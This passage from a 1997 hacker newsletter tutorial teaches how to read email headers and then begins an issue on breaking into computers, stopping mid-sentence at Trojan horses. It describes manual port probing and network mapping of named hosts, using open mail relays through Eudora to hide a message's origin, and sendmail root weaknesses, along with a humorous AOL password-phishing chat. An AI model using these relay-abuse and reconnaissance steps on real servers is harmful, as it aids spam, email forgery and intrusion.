for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.comHey, have you ever wondered why all that stuff is there and what it means? We’ll return to this example later in this tutorial. But first we must consider the burning question of the day:
WHY ARE HEADERS FUN?
Why bother with those “blah blah blah” headers? They are boring, right? Wrong!
1) Ever hear a wannabe hacker complaining he or she doesn’t have the addresses of any good computers to explore? Have you ever used one of those IP scanner programs that find valid Internet Protocol addresses of Internet hosts for you? Well, you can find gazillions of valid addresses without the crutch of one of these programs simply by reading the headers of emails.
2) Ever wonder who really mailed that “Make Money Fast” spam? Or who is that klutz who email bombed you? The first step to learning how to spot email forgeries and spot the culprit is to be able to read headers.
3) Want to learn how to convincingly forge email? Do you aspire to write automatic spam or email bomber programs? (I disapprove of spammer and email bomb programs, but let’s be honest about the kinds of knowledge their creators must draw upon.) The first step is to understand headers.
4) Want to attack someone’s computer? Find out where best to attack from the headers of their email. I disapprove of this use, too. But I’m dedicated to telling you the truth about hacking, so like it or not, here it is.
HOW CAN YOU SEE FULL HEADERS?
So you look at the headers of your email and it doesn’t appear have any good stuff whatsoever. Want to see all the hidden stuff? The way you do this depends on what email program you are using.
The most popular email program today is Eudora. To see full headers in Eudora, just click the “blah, blah, blah” button on the far left end of the tool bar.
The Netscape web browser includes an email reader. To see full headers, click on Options, then click the “Show All Headers” item.
Sorry, I haven’t looked into how to do that with Internet Explorer. Oh, no, I can see the flames coming, how dare I not learn the ins and outs of IE mail! But, seriously, IE is a dangerously insecure Web browser because it is actually a Windows shell. So no matter how often Microsoft patches its security flaws, chances are you will be hurt by it one of these days. Just say “no” to IE.
Another popular email program is Pegasus. Maybe there is an easy way to see full headers in Pegasus, but I haven’t found it. The hard way to see full headers in Pegasus -- or IE -- or any email program -- is to open your mail folders with Wordpad. It is included in the Windows 95 operating system and is the best Windows editing program I have found for handling documents with lots of embedded control characters and other oddities.
The Compuserve 3.01 email program automatically shows full headers. Bravo, Compuserve!
Pine is the most popular email program used with Unix shell accounts. Since in order to be a real hacker you will sooner or later be using Unix, now may be a great time to start using Pine.
*************************************************
Newbie note: Pine stands for Pine Is Not Elm, a tribute to the really, truly ancient Elm email program (which is still in use). Both Pine and Elm date back to ARPAnet, the US Defense Advanced Research Projects Agency computer network that eventually mutated into today’s Internet. OK, OK, that was a joke. According to the official blurb, “PINE is the University of Washington's ‘Program for Internet News and
Email’.”
*************************************************If you have never used Pine before, you may find it isn’t as easy to use as those glitzy Windows email programs. But aside from its amazing powers, there is a really good reason to learn to compose email in Pine: you get practice using pico editor commands. If you want to be a real hacker, you will be using the pico editor (or another editor that uses similar commands) someday when you are writing programs in a Unix shell.
To bring up Pine, at the cursor in your Unix shell simply type in “pine.”
In Pine, while viewing an email message, you may be able to see full headers by simply hitting the “h” key. If this doesn’t work, you will have to go into the Setup menu to enable this command. To do this, go to the main menu and give the command “s” for Setup. Then in the Setup menu choose “c” for Config. On the second page of the Config menu you will see something like this:
PINE 3.91 SETUP CONFIGURATION Folder: INBOX 2 Messages
[ ] compose-rejects-unqualified-addrs
[ ] compose-sets-newsgroup-without-confirm
[ ] delete-skips-deleted
[ ] enable-aggregate-command-set
[ ] enable-alternate-editor-cmd
[ ] enable-alternate-editor-implicitly
[ ] enable-bounce-cmd
[ ] enable-flag-cmd
[X] enable-full-header-cmd
[ ] enable-incoming-folders
[ ] enable-jump-shortcut
[ ] enable-mail-check-cue
[ ] enable-suspend
[ ] enable-tab-completion
[ ] enable-unix-pipe-cmd
[ ] expanded-view-of-addressbooks
[ ] expanded-view-of-folders
[ ] expunge-without-confirm
[ ] include-attachments-in-reply? Help E Exit Config P Prev - PrevPage
X [Set/Unset] N Next Spc NextPage W WhereIsYou first highlight the line that says “enable-full-header-command” and then press the “x” key. The give “e” to exit saving the change. Once you have done this, when you are reading your email you will be able to see full headers by giving the “h” command.
Elm is another Unix email reading program. It actually gives slightly more detailed headers than Pine, and automatically shows full headers.
WHAT DOES ALL THAT STUFF IN YOUR HEADERS MEAN?
We’ll start by taking a look at a mildly interesting full header. Then we’ll examine two headers that reveal some interesting shenanigans. Finally we will look at a forged header.
OK, let us return to that fairly ordinary full header we looked at above. We will decipher it piece by piece. First we look at the simple version:
From: Vegbar Fubar <fooha@ifi.foobar.no>
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.comThe information within any header consists of a series of fields separated from each other by a “newline” character. Each field consists of two parts: a field name, which includes no spaces and is terminated by a colon; and the contents of the field. In this case the only fields that show are “From:,” “Date:,” and “To:”.
In every header there are two classes of fields: the “envelope,” which contains only the sender and recipient fields; and everything else, which is information specific to the handling of the message. In this case the only field that shows which gives information on the handling of the message is the Date field.
When we expand to a full header, we are able to see all the fields of the header. We will now go through this information line by line.
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
This line tells us that I downloaded this email from the POP server at a computer named o200.fooway.net. This was done on behalf of my account with email address of techbr@fooway.net. The (950413.SGI.8.6.12/951211.SGI) part identifies the software name and version running that POP server.
********************************************
Newbie note: POP stands for Post Office Protocol. Your POP server is the computer that holds your email until you want to read it. Usually your the email program on your home computer or shell account computer will connect to port 110 on your POP server to get your email.
A similar, but more general protocol is IMAP, for Interactive Mail Access Protocol. Trust me, you will be a big hit at parties if you can hold forth on the differences between POP and IMAP, you big hunk of a hacker, you! (Hint: for more info, RTFRFCs.)
********************************************Now we examine the second line of the header:
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Well, gee, I didn’t promise that this header would be *totally* ordinary. This line tells us that a computer named ifi.foobar.no passed this email to the POP server on o200.fooway.net for someone with the email address of hacker@techbroker.com. This is because I am piping all email to hacker@techbroker.com into the account techbr@fooway.net. Under Unix this is done by setting up a file in your home directory named “.forward” with the address to which you want your email sent. Now there is a lot more behind this, but I’m not telling you. Heh, heh. Can any of you evil geniuses out there figure out the whole story?
“ESMTP” stands for “extended simple mail transfer protocol.” The “950413.SGI.8.6.12/951211.SGI” designates the program that is handling my email.
Now for the next line in the header:
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
This line tells us that the computer ifi.foobar.no got this email message from the computer gyllir.ifi.foobar.no. These two computers appear to be on the same LAN. In fact, note something interesting. The computer name gyllir.ifi.foobar.no has a number after it, 129.xxx.64.230. This is the numerical representation of its name. (I substituted “.xxx.” for three numbers in order to fubar the IP address.) But the computer ifi.foobar.no didn’t have a number after its name. How come?
Now if you are working with Windows 95 or a Mac you probably can’t figure out this little mystery. But trust me, hacking is all about noticing these little mysteries and probing them (until you find something to break, muhahaha -- only kidding, OK?)
But since I am trying to be a real hacker, I go to my trusty Unix shell account and give the command:
>nslookup ifi.foobar.no
Server: Fubarino.com
Address: 198.6.71.10Non-authoritative answer:
Name: ifi.foobar.no
Address: 129.xxx.64.2Notice the different numerical IP addresses between ifi.foobar.no and gyllir.ifi.foobar.no. Hmmm, I begin to think that the domain ifi.foobar.no may be a pretty big deal. Probing around with dig and traceroute leads me to discover lots more computers in that domain. Probing with nslookup in the mode “set type=any” tells me yet more.
Say, what does that “.no” mean, anyhow? A quick look at the International Standards Organization (ISO) records of country abbreviations, I see “no” stands for Norway. Aha, it looks like Norway is an arctic land of fjords, mountains, reindeer, and lots and lots of Internet hosts. A quick search of the mailing list for Happy Hacker reveals that some 5% of its almost 4,000 email addresses have the .no domain. So now we know that this land of the midnight sun is also a hotbed of hackers! Who said headers are boring?
On to the next line, which has the name and email address of the sender:
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMTI’m going to do some guessing here. This line says the computer gyllir.ifi.foobar.no got this email message from Vegbar Fubar on the computer “localhost.” Now “localhost” is what a Unix computer calls itself. While in a Unix shell, try the command “telnet localhost.” You’ll get a login sequence that gets you right back into your own account.
So when I see that gyllir.ifi.foobar.no got the email message from “localhost” I assume that means the sender of this email was logged into a shell account on gyllir.ifi.foobar.no, and that this computer runs Unix. I quickly test this hypothesis:
> telnet gyllir.ifi.foobar.no
Trying 129.xxx.64.230...
Connected to gyllir.ifi.foobar.no.
Escape character is '^]'.
IRIX System V.4 (gyllir.ifi.foobar.no)
Now Irix is a Unix-type operating system for Silicon Graphics Inc. (SGI) machines. This fits with the name of the POP server software on ifi.foobar.no in the header of (950413.SGI.8.6.12/951211.SGI). So, wow, we are looking at a large network of Norwegian computers that includes SGI boxes. We could find out just how many SGI boxes with patience, scanning of neighboring IP addresses, and use of the Unix dig and nslookup commands.
Now you don’t see SGI boxes just every day on the Internet. SGI computers are optimized for graphics and scientific computing.
So I’m really tempted to learn more about this domain. Oftentimes an ISP will have a Web page that is found by directing your browser to its domain name. So I try out http://ifi.foobar.no. It doesn’t work, so I try http://www.ifi.foobar.no. I get the home page for the University of Oslo Institutt for Informatikk. The Informatikk division has strengths in computer science and image processing. Now wonder people with ifi.foobar.no get to use SGI computers.
Next I check out www.foobar.no and learn the University of Oslo has some 39,000 students. No wonder we find so many Internet host computers under the ifi.foobar.no domain!
But let’s get back to this header. The next line is pretty simple, just the date:
Date: Fri, 11 Apr 1997 18:09:53 GMT
But now comes the most fascinating line of all in the header, the message ID:
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>The message ID is the key to tracking down forged email. Avoiding the creation of a valid message ID is the key to using email for criminal purposes. Computer criminals go to a great deal of effort to find Internet hosts on which to forge email that will leave no trace of their activities through these message IDs.
The first part of this ID is the date and time. 199704111809 means 1997, April 11, 18:08 (or 6:08 PM). Some message IDs also include the time in seconds. Others may leave out the “19” from the year. The 13156 is a number identifying who wrote the email, and gyllir@ifi.foobar.no refers to the computer, gyllir within the domain ifi.foobar.no, on which this record is stored.
Where on this computer are the records of the identities of senders of email stored? Now Unix has many variants, so I’m not going to promise these records will be in a file of the same name in every Unix box. But often they will be in either the syslog files or usr/spool/mqueue. Some sysadmins will archive the message IDs in case they need to find out who may have been abusing their email system. But the default setting for some systems, for example those using sendmail, is to not archive. Unfortunately, an Internet host that doesn’t archive these message IDs is creating a potential haven for email criminals.
Now we will leave the University of Norway and move on to a header that hides a surprise.
Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT
Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400
Message-Id: <2.2.16.19970428082132.2cdf544e@fubar.com>
X-Sender: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: galfina@Fubarino.com
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Sample header
Date: 27 Apr 1997 22:53:37 -0400Let’s look at the first line:
Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT
This first line tells us that it was received by the email account “galfina@Fubarino.com”. That’s the “for <galfina@Fubarino.com>“ part. The Internet host computer that sent the email to galfina was mail6.foo1.csi.com [149.xxx.183.75]. This computer name is given first in a form easily (ha, hah!) read by humans followed by the version of its name that a computer can more easily translate into the 0’s and 1’s that computers understand.
“Galfina” is my user name. I chose it in order to irritate G.A.L.F. (Gray Areas Liberation Front).
“Fubarino.com (8.8.3/8.6.9)” is the name of the computer that received the email for my galfina account. But notice it is a very partial computer name. All we get is a domain name and not the name of the computer from which I download my email. We can guess that Fubarino.com is not the full name because Fubarino is a big enough ISP to have several computers on a LAN to serve all its users.
**************************************************
Evil genius tip: Want to find out the names of some of the computers on your ISP’s LAN? Commands that can dredge some of them up include the Unix commands traceroute, dig, and who.For example, I explored the Fubarino.com LAN and found free.Fubarino.com (from command “dig Fubarino.com”); and then dialin.Fubarino.com and milnet.Fubarino.com (from “who” given while logged in my galfina account)
Then using the numerical addresses given from the dig command with these names of Fubarino.com computers I then was able, by checking nearby numbers, to find a whole bunch more names of Fubarino.com computers.
**************************************************The number after Fubarino.com is not a numerical IP address. It is the designation of the version of the mail program it runs. We can guess from these numbers 8.8.3/8.6.9 that it refers to the Sendmail program. But just to make sure, we try the command “telnet Fubarino.com 25.” This gives us the answer:
220 Fubarino.com ESMTP Sendmail 8.8.3/8.6.9 ready at Mon, 28 Apr 1997 09:55:58 GMT
So from this we know Fubarino.com is running the Sendmail program.
**************************************************
Evil genius tip: Sendmail is notorious for flaws that you can use to gain root access to a computer. So even though Fubarino.com is using a version of sendmail that has been fixed from its most recently publicized security holes, if you are patient a new exploit will almost certainly come out within the next few months. The cure for this problem may possibly be to run qmail, which so far hasn’t had embarrassing problems.
**************************************************OK, now let’s look at the next “received” line in that header:
Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400
CISPPP stands for Compuserve Information Services point to point protocol (PPP) connection. This means that the mail was sent from a PPP connection I set up through Compuserve. We also see that Compuserve uses the Microsoft SMTPSVC mail program.
However, we see from the rest of the header that the sender (me) didn’t use the standard Compuserve mail interface:
Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com>
The number 2.2.16. was inserted by Eudora, and means I am using Eudora Pro 2.2, 16-bit version. The 19970428082132 means the time I sent the email, in order of year (1997), month (04), day (28) and time (08:31:32).
The portion of the message ID “2cdf544e@fubaretta.com” is the most important part. That is provided by the Internet host where a record of my use of fubaretta’s mail server has been stored.
Did you notice this message ID was not stored with Compuserve, but rather with fubaretta.com? This is, first of all, because the message ID is created with the POP server that I specified with Eudora. Since Compuserve does not yet offer POP servers, I can only use Eudora to send email over a Compuserve connection but not to receive Compuserve email. So, heck, I can specify an arbitrary POP server when I send email over Compuserve from Eudora. I picked the Fubaretta ISP. So there!
If I were to have done something bad news with that email such as spamming, extortion or email bombing, the sysadmin at fubaretta.com would look up that message ID and find information tying that email to my Compuserve account. That assumes, of course, that fubaretta.com is archiving message IDs.
So when you read this part of the header you might think that the computer where I pick up my email is with the Fubaretta.com ISP. But all this really means is that I specified to Eudora that I was using a mail account at Fubar. But if I had put a different account name there, then I would have generated a different message ID.
Did I need to have an account at Fubaretta? No. The mail server did not ask for a password. In fact, I don’t have an account at Fubaretta.
The rest of the header is information provided by Eudora:
X-Sender: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"The “X-Mailer” information tells you I was using the 16 bit version of Windows Eudora Pro Version 2.2. Some people have asked me why I don’t use the 32 bit version (which runs on Win 95) instead of the 16 bit version. Answer: better error handling! That’s the same reason I don’t normally use Pegasus. Also, Eudora lets me get away with stuph:)
Mime (Multipurpose Internet Mail Extensions)is a protocol to view email. Those of you who got lots of garbage when I sent out GTMHH and Digest can blame it on Mime. If your email program doesn’t use Mime, you get lots of stuff like “=92” instead of what I tried to send. But this time I turned off the “printed quotable” feature in Eudora. So this time I hope I sent all you guys plain, friendly ASCII. Please email me if what you got was still messed up, OK?
The character set “us-ascii” tells us what character set this email will use. Some email uses ISO ascii instead, generally if it originates outside the US.
Now let’s look at a slightly more exciting header. In fact, this is a genuine muhahaha header. Remember that war I declared on Web sites that provide downloads of email bombing programs? You know, those Windows 95 for lusers programs that run from a few mouse clicks? Here’s a header that reveals my tiny contribution toward making life unpleasant for the ISPs that distribute these programs. It’s from the Happy Hacker Digest, April 12, 1997, from a copy that reached a test email address I had on the list:
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400
Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <pettit@techbroker.com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Happy Hacker Digest April 12, 1997Now let’s examine the first field:
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400We already looked at this computer o200.fooway.net above. But, heck, let’s probe a little more deeply. Since I suspect this is a POP server, I’m going to telnet to port 110, which is normally the POP server port.
> telnet o200.fooway.net 110
Trying 207.xxx.192.57...
Connected to o200.fooway.net.
Escape character is '^]'.
+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at mail starting.Now we know more about Fooway Technology’s POP server. If you have ever run one of those hacker “strobe” type programs that tell you what programs are running on each port of a computer, there is really no big deal to it. They just automate the process that we are doing here by hand. But in my humble opinion you will learn much more by strobing ports by hand the same way I am doing here.
Now we could do lots more strobing, but I’m getting bored. So we check out the second field in this header:
Date: Mon, 14 Apr 1997 12:05:22 -0400
That -0400 is a time correction. But to what is it correcting? Let’s see the next field in the header:
Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <hacker@techbroker.com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Hmmm, why is mocha.icefubarnet.com in the header? If this header isn’t forged, it means this mail server was handling the Happy Hacker Digest mailing. So where is mocha.icefubarnet.com located? A quick use of the whois command tells us:
> whois icefubarnet.com
ICEFUBARNET INTERNET, INC (ICEFUBARNET-DOM)
2178 Fooway
North Bar, Oregon 97xxx
USANow this is located four time zones earlier than the computer o200.fooway.net. So this explains the time correction notation of -0400.
Next field on the header tells us:
Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
This tells us that the Happy Hacker Digest was delivered to the mail server (SMTP stands for simple mail transport protocol) at mocha.icefubarnet.com by Compuserve. But, and this is very important to observe, once again I did not use the Compuserve mail system. This merely represents a PPP session I set up with Compuserve. How can you tell? Playing with nslookup shows that the numerical representation of my Compuserve connection isn’t an Internet host. But you can’t learn much more easily because Compuserve has great security -- one reason I use it. But take my word for it, this is another way to see a Compuserve PPP session in a header.
Now we get to the biggie, the message ID:
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
Whoa, how come that ID is at the computer mail.fooway.net? It’s pretty simple. In Eudora I specified my POP server as mail.fooway.net. But if you were to do a little stobing, you would discover that while fooway.net has a POP server, it doesn’t have an SMTP or ESMTP server. You can get mail from Fooway, but you can’t mail stuff out from Fooway. But the marvelous workings of the Internet combined with the naivete of the Eudora Pro 2.2 program sent my message ID off to mail.fooway.net anyhow.
On the message ID, the “2.2.16” was inserted by Eudora. That signifies it is the 2.2 version for a 16 bit operating system.
The remaining fields of the header were all inserted by Eudora:
X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Happy Hacker Digest April 12, 1997Notice Eudora does let us know that techbr@mail.fooway.net is unverified as sender. And in fact, it definitely is not the sender. This is a very important fact. The message ID of an email is not necessarily stored with the computer that sent it out.
So how was I able to use Icefubarnet Internet’s mail server to send out the Happy Hacker Digest? Fortunately Eudora’s naivete makes it easy for me to use any mail server that has an open SMTP or ESMTP port. You may be surprised to discover that there are uncountable Internet mail servers that you may easily commandeer to send out your email -- if you have the right program -- or if you know how to telnet to port 25 (which runs using the SMTP or ESMTP protocols) and give the commands to send email yourself.
Why did I use Icefubarnet? Because at the time it was hosting an ftp site that was being used to download email bomber programs (http://www.icefubarnet.com/~astorm/uy4beta1.zip). Last time I checked the owner of the account from which he was offering this ugly stuff was unhappy because Icefubarnet Internet had made him take it down.
But -- back to how to commandeer mail servers while sending your message Ids elsewhere. In Eudora, just specify your victim mail server under the hosts section of the options menu (under tools). Then specify the computer to which you want to send your message ID under “POP Server.”
But if you try any of this monkey business with Pegasus, it gives a nasty error message accusing you of trying to forge email.
Of course you can always commandeer mail servers by writing your own program to commander mail servers. But that will be covered in the upcoming GTMHH on shell programming.
*********************************************
Newbie note: Shell programming? What the heck izzat? It means writing a program that uses a sequence of commands available to you in your Unix shell. If you want to be a real hacker, you *must* learn Unix! If you are serious about continuing to study these GTMHHs, you *must* either get a shell account or install some form of Unix on your home computer. You may find places where you can sign up for shell accounts through http://www.celestin.com/pocia/. Or email haxorshell@techbroker.com for information on how to sign up with a shell account that is friendly to hackers and that you may securely telnet into from your local ISP PPP dialup.
*********************************************Hang, on, Vol. 3 Number 5 will get into the really hairy stuff: how to do advanced deciphering of forged headers. Yes, how to catch that 31137 d00d who emailbombed you or spammed you!
Happy Hacking, and be good!
_________________________________________________________Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
___________________________________________________________________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 5
The Dread GTMHH on Cracking
____________________________________________________________Nowadays if you ask just about anyone what a hacker is, he or she will tell you “a person who breaks into computers.”
That is partly on account of news stories which make it seem like the only thing a hacker does is commit computer crime. But there also is some truth to the public view. An obsession with breaking into computers has swept the hacker world. In fact, lots of hackers make fun of the kinds of stuff I think is fun: forging email and Usenet posts and programming Easter eggs into commercial software and creating Win 95 bootup screens that say “Bill Gates’ mother wears army boots.”
But since everyone and his brother has been emailing me pleading for instructions on how to break into computers, here it is. The dread GTMHH on Cracking. Yes, you, too, can become a genuine computer cracker and make everyone quake in his or her boots or slippers or whatever footgear they are wearing lately.
“But, but,” you say. “This list is for *legal* hacking. Sez right here in the welcome message you sent me when I signed up.”
Welcome to reality, Bub. Hackers fib sometimes.
************************************************
You can go to jail warning: Almost everywhere on the planet, breaking into a computer is illegal. The only exceptions are breaking into your own computer, or breaking into a computer whose owner has given you permission to try to break in. It doesn’t matter if you are just quietly sneaking around doing no harm. It doesn’t matter if you make some stranger’s computer better. You’re still in trouble if you break in without permission.
************************************************Honestly, this Guide really *is* about harmless hacking. You don’t have to commit a crime to crack into a computer. From time to time hardy souls offer up their computers for their friends, or sometimes even the entire world, as targets for cracking. If you have permission from the owner of a computer, it is most definitely legal to break into it.
In fact, here’s a really fun computer that you have permission to break into. Damien Sorder invites you to break into his Internet host computer obscure.sekurity.org.
But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How do you know I’m not just playing a mean old trick on Damien by sending out an invitation to break into his box to the 5,000 crazed readers of the Happy Hacker list?
Here’s a good way to check the validity of offers to let anyone try to break into a computer. Get the domain name of the target computer, in this case obscure.sekurity.org. Then add “root@” to the domain name, for example root@obscure.sekurity.org. Email the owner of that computer. Ask him if I was fibbing about his offer. If he says I made it up, tell him he’s just chicken, that if he was a real hacker he’d be happy to have thousands of clueless newbies running Satan against his box. Just kidding:)
Actually, in this case you may email info@sekurity.org for more details on Damien’s offer to let one and all try to crack his box. Also, please be good guys and attack off hours (Mountain Daylight Savings Time, US) so he can use obscure.sekurity.org for other stuff during the day.
Also, Damien requests “If you (or anyone) want to try to hack obscure, please mail root@sekurity.org and mention that you are doing it, and what domain you are coming from. That way I can distinguish between legit and real attacks.”
We all owe you thanks, Damien, for providing a legal target for the readers of this GTMHH to test their cracking skills.
So let’s assume that you have chosen a legitimate target computer to try to break into. What? Some guys say it’s too hard to break into a fortified box like obscure.sekurity.org? They say it’s more fun to break into a computer when they’re breaking the law? They say to be a Real Hacker you must run around trashing the boxes of the cringing masses of Internet hosts? Haw, haw, sendmail 4.0! What lusers, they say. They sure taught those sendmail 4.0 dudes a lesson, right?
I say that those crackers who go searching for vulnerable computers and breaking into them are like Lounge Lizard Larry going into a bar and picking up the drunkest, ugliest gal (or guy) in the place. Yeah, we all are sure impressed.
If you want to be a truly elite cracker, however, you will limit your forays to computers whose owners consent to your explorations. This can -- should!-- include your own computer.
So with this in mind -- that you want more from life than to be the Lounge Lizard Larry of the hacker world -- here are some basics of breaking into computers.
There are an amazing number of ways to break into computers.
The simplest is to social engineer your way in. This generally involves lying. Here’s an example.
*********************************************
From: Oracle Service Humour List <oracle-list-return-@synapse.net>
Subject: HUM: AOL Hacker Turnaround (***)
Read Newfpyr's masterful turning of the tables on a hacker...
Certainly one of the best Absurd IMs we've EVER received! Newfpyr's comments are in brackets throughout.
Zabu451: Hello from America Online! I'm sorry to inform you that there has been an error in the I/O section of your account database, and this server's password information has been temporarily destroyed. We need you, the AOL user, to hit reply and type in your password. Thank you for your
help.Newfpyr: Hello! This is Server Manager #563. I'm sorry to hear that your server has lost the password info. I mean, this has been happening too much lately. We have developed some solutions to this problem. Have you got the mail sent out to all server managers?
Zabu451: no
NewfPyr: Really? Ouch. There's been some problems with the server mailer lately. Oh, well. Here's a solution to this problem: try connecting your backup database to your main I/O port, then accessing the system restart.
Zabu451: no i still need passwords
NewfPyr: I see. Do you want me to send you the list of all the passwords of all the screen names of your server?Zabu451: ya i want that
NewfPyr: Let me get the server manager to send it...NewfPyr: He says I need your server manager password. Could you please type it in?
Zabu451: i dont have one
NewfPyr: What do you mean? That's the first thing every manager gets!
Zabu451: it got deleted
NewfPyr: Wow! You must be having a lot of trouble. Let me find out what server you're using...[Note: I checked his profile. It said he was from Springfield, Mass.]
NewfPyr: Okay, your number has been tracked to an area in Springfield, Mass.
Zabu451: how did u know?!!!?!?!!?!?!?!?!??!!
NewfPyr: I used Server Tracker 5.0 . Don't you have it?
Zabu451: do you know my address!?!?!?!!?!?
NewfPyr: Of course not.
Zabu451: good
NewfPyr: I only know the number you're calling AOL from, which is from your server, right?Zabu451: yes
NewfPyr: Good. Okay, now that we have your number, we have your address, and we are sending a repair team over there.
Zabu451: nonononono dont stop them now
NewfPyr: Why? Isn't your server down?
Zabu451: nonono its working now
NewfPyr: They’re still coming, just in case.
Zabu451: STOP THEM NOW
NewfPyr: I can't break AOL Policy.
Zabu451: POEPLE ARE COMING TO MY HOUSE?!?!?!?!??
NewfPyr: No! To your server. You know, where you're calling AOL from.
Zabu451: im calling from my house
NewfPyr: But you said you where calling from the server!
Zabu451: i lied im not reely a server guy
NewfPyr: But you said you were!
Zabu451: i lied i trying to get passwords please make them stop
NewfPyr: Okay. The repair team isn't coming anymore.
Zabu451: good
NewfPyr: But a team of FBI agents is.Zabu451: NONONONO
Zabu451: im sorry
Zabu451: ill never do it again please make them not come
Zabu451: PLEASE IL STOP ASKING FOR PASSWORDS FOREVER PLEASE MAKE THEM STOP!!NewfPyr: I’m sorry, I can't do that. They should be at your house in 5 minutes.
Zabu451: IM SORRY IL DO ANYTHING PLEASE I DONT WANT THEM TO HURT ME
Zabu451: PLEASE
Zabu451: PLEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSENewfPyr: They won't hurt you! You'll probably only spend a year of prison.
Zabu451: no IM ONLY A KID
NewfPyr: You are? That makes it different. You won’t go to prison for a year.
Zabu451: i thout so
NewfPyr: You’ll go for two years.
Zabu451: No! IM SORRY
Zabu451: PLEASE MAKE THEM STOP
Zabu451: PLEASE[I thought this was enough. He was probably wetting his pants.]
NewfPyr: Since this was a first time offense, I think I can drop charges.
Zabu451: yea
Zabu451: thankyouthankyouthankyouNewfPyr: The FBI agents have been withdrawn. If you ever do it again, we'll bump you off.
Zabu451: i wont im sorry goodbye
[He promptly signed off.]
One of the RARE RARE occasions that we've actually felt sorry for the hacker. SEVENTY FIVE TOKENS to you, NewfPyr! We're STILL laughing - thanks a lot!
Submitted by: Fran C. M. T. @ aol.com
(Want more of this humor in a jugular vein? Check out http://www.netforward.com/poboxes/?ablang)
*****************************************Maybe you are too embarrassed to act like a typical AOL social engineering hacker. OK, then maybe you are ready to try the Trojan Horse. This is a type of attack wherein a program that appears to do something legitimate has been altered to attack a computer.
